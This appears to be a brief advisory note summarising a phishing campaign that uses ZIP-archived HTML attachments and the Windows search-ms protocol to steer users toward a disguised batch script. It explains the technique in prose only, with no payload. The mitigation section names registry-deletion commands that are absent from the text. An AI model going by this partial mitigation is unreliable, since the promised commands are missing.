Search & Spoof: Abuse of Windows Search to Redirect to Malware

Date: June 11, 2024
CVE: Not specified
Vulnerability Type: URL Redirection to Untrusted Site
CWE: [[CWE-601]]
Sources: SpiderLabs Blog

Synopsis

A phishing campaign leverages the Windows search protocol via HTML attachments to redirect users to malware, exploiting system vulnerabilities and user behavior.

Issue Summary

The campaign starts with a phishing email containing a ZIP-archived HTML file disguised as a routine document. Upon opening, the HTML file exploits the Windows search protocol to execute malicious commands. The file uses a <meta http-equiv="refresh" tag to reload the page and redirect the browser to a new URL, and an anchor tag as a fallback should the browser block the redirect.

Technical Key Findings

The attack uses the search: protocol to directly interact with Windows Explorer, directing searches to malicious servers. It involves parameters like query, crumb, displayname, and location, making the malicious activity appear legitimate. The attack concludes with the user being prompted to run a batch script disguised as a shortcut file.

![[Figure 5. Search window displaying results after invoking the search query..webp]]

Vulnerable Products

The specific vulnerability affects Windows systems that allow search-ms and search URI protocols to execute without adequate validation.

Impact Assessment

If exploited, this vulnerability can lead to unauthorized execution of malicious scripts, potentially compromising the user’s system and allowing further malicious activities, such as data theft or additional malware installation.

Patches or Workaround

Mitigation involves disabling the search-ms and search URI handlers by deleting associated registry entries with the following commands:

Additionally, security updates for email scanners can detect and block such malicious HTML files.

Tags

#Windows #Malware #Phishing #URLRedirection #CyberSecurity #Cloudflare #IPFS #Trustwave